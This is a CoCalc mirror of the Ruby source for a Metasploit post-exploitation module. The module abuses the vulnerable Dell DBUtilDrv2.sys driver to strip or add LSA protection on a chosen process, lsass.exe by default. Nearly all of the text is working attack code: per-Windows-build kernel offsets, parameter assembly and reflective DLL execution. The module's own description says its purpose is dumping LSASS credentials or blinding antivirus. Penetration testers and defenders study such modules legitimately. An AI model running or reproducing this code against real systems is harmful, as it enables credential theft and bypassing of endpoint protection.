CoCalc provides the best real-time collaborative environment for Jupyter Notebooks, LaTeX documents, and SageMath, scalable from individual users to large groups and classes!
CoCalc provides the best real-time collaborative environment for Jupyter Notebooks, LaTeX documents, and SageMath, scalable from individual users to large groups and classes!
Path: blob/master/modules/post/windows/manage/dell_memory_protect.rb
Views: 1904
##1# This module requires Metasploit: https://metasploit.com/download2# Current source: https://github.com/rapid7/metasploit-framework3##45class MetasploitModule < Msf::Post6Rank = ManualRanking78include Msf::Exploit::Local::WindowsKernel9include Msf::Post::File10include Msf::Post::Process11include Msf::Post::Windows::Priv12include Msf::Post::Windows::Process13include Msf::Post::Windows::ReflectiveDLLInjection1415def initialize(info = {})16super(17update_info(18info,19'Name' => 'Dell DBUtilDrv2.sys Memory Protection Modifier',20'Description' => %q{21The Dell DBUtilDrv2.sys drivers version 2.5 and 2.7 have a write-what-where condition22that allows an attacker to read and write arbitrary kernel-mode memory. This module23installs the provided driver, enables or disables LSA protection on the provided24PID, and then removes the driver. This would allow, for example, dumping LSASS memory25even when secureboot is enabled or preventing antivirus from accessing the memory of26a chosen PID.2728The affected drivers are not distributed with Metasploit. You will truly need to29Bring Your Own (Dell) Driver.30},31'License' => MSF_LICENSE,32'Author' => [33'SentinelLabs', # Vulnerability discovery in original Dell driver (dbutil_2_3.sys)34'Kasif Dekel', # (from SentinelLabs) blog with detailed analysis35'Red Cursor', # Authors of PPLKiller36'Jacob Baines' # first reference of incomplete patch, poc, & metasploit module37],38'Platform' => 'win',39'SessionTypes' => [ 'meterpreter' ],40'References' => [41[ 'URL', 'https://www.rapid7.com/blog/post/2021/12/13/driver-based-attacks-past-and-present/'],42[ 'URL', 'https://docs.microsoft.com/en-us/windows-server/security/credentials-protection-and-management/configuring-additional-lsa-protection'],43[ 'URL', 'https://itm4n.github.io/lsass-runasppl/'],44[ 'URL', 'https://labs.sentinelone.com/cve-2021-21551-hundreds-of-millions-of-dell-computers-at-risk-due-to-multiple-bios-driver-privilege-escalation-flaws/' ],45[ 'URL', 'https://attackerkb.com/assessments/12d7b263-3684-4442-812e-dc30b93def93'],46[ 'URL', 'https://github.com/RedCursorSecurityConsulting/PPLKiller'],47[ 'URL', 'https://github.com/jbaines-r7/dellicious' ]48],49'Notes' => {50'Reliability' => [ ],51'Stability' => [ CRASH_OS_RESTARTS ],52'SideEffects' => [ IOC_IN_LOGS, ARTIFACTS_ON_DISK ]53}54)55)56register_options([57OptString.new('DRIVER_PATH', [true, 'The path containing the driver inf, cat, and sys (and coinstaller)', '']),58OptInt.new('PID', [true, 'The targetted process. If set to 0 the module will automatically target lsass.exe', '0']),59OptBool.new('ENABLE_MEM_PROTECT', [true, 'Enable or disable memory protection', 'false'])60])61end6263def get_eproc_offsets64unless session.platform == 'windows'65print_status("Target is not Windows. Found #{session.platform}")66return nil67end6869version = get_version_info70vprint_status("Windows Build Number = #{version.build_number}")7172# UniqueProcessIdOffset, ActiveProcessLinksOffset, SignatureLevelOffset73offsets = {74Msf::WindowsVersion::Win10_1507 => [ 0x02e8, 0x02f0, 0x06a8 ], # Gold75Msf::WindowsVersion::Win10_1511 => [ 0x02e8, 0x02f0, 0x06b0 ], # 2015 update76Msf::WindowsVersion::Win10_1607 => [ 0x02e8, 0x02f0, 0x06c8 ], # 2016 update77Msf::WindowsVersion::Win10_1703 => [ 0x02e0, 0x02e8, 0x06c8 ], # April 2017 update78Msf::WindowsVersion::Win10_1709 => [ 0x02e0, 0x02e8, 0x06c8 ], # Fall 2017 update79Msf::WindowsVersion::Win10_1803 => [ 0x02e0, 0x02e8, 0x06c8 ], # April 2018 update80Msf::WindowsVersion::Win10_1809 => [ 0x02e0, 0x02e8, 0x06c8 ], # October 2018 update81Msf::WindowsVersion::Win10_1903 => [ 0x02e8, 0x02f0, 0x06f8 ], # May 2019 update82Msf::WindowsVersion::Win10_1909 => [ 0x02e8, 0x02f0, 0x06f8 ], # November 2019 update83Msf::WindowsVersion::Win10_2004 => [ 0x0440, 0x0448, 0x0878 ], # May 2020 update84Msf::WindowsVersion::Win10_20H2 => [ 0x0440, 0x0448, 0x0878 ], # October 2020 update85Msf::WindowsVersion::Win10_21H1 => [ 0x0440, 0x0448, 0x0878 ], # May 2021 update86Msf::WindowsVersion::Win10_21H2 => [ 0x0440, 0x0448, 0x0878 ], # October 2021 update87Msf::WindowsVersion::Win11_21H2 => [ 0x0440, 0x0448, 0x0878 ] # Win 11 June/September 202188}8990unless offsets.key?(version.build_number)91print_status("Unknown offsets for Windows build #{version.build_number}")92return nil93end9495return offsets[version.build_number]96end9798def run99unless is_system?100fail_with(Failure::None, 'Elevated session is required')101end102103offsets = get_eproc_offsets104if offsets.nil?105fail_with(Failure::NoTarget, 'Unsupported target')106end107108if sysinfo['Architecture'] == ARCH_X64 && session.arch == ARCH_X86109fail_with(Failure::NoTarget, 'Running against WOW64 is not supported')110end111112unless datastore['DRIVER_PATH'].include? '\\'113fail_with(Failure::BadConfig, "The driver path must be a file path. User provided: #{datastore['DRIVER_PATH']}")114end115116# If the user doesn't select a PID select lsass.exe for them117target_pid = datastore['PID']118if target_pid == 0119target_pid = pidof('lsass.exe').first120print_status("Set PID option #{target_pid} for lsass.exe")121end122123params = datastore['DRIVER_PATH']124params += ','125params += target_pid.to_s126params += ','127params += (datastore['ENABLE_MEM_PROTECT'] ? '1' : '0')128params += ','129params += offsets[0].to_s # UniqueProcessIdOffset130params += ','131params += offsets[1].to_s # ActiveProcessLinksOffset132params += ','133params += offsets[2].to_s # SignatureLevelOffset134135execute_dll(::File.join(Msf::Config.data_directory, 'exploits', 'dell_protect', 'dell_protect.x64.dll'), params)136137print_good('Exploit finished')138end139end140141142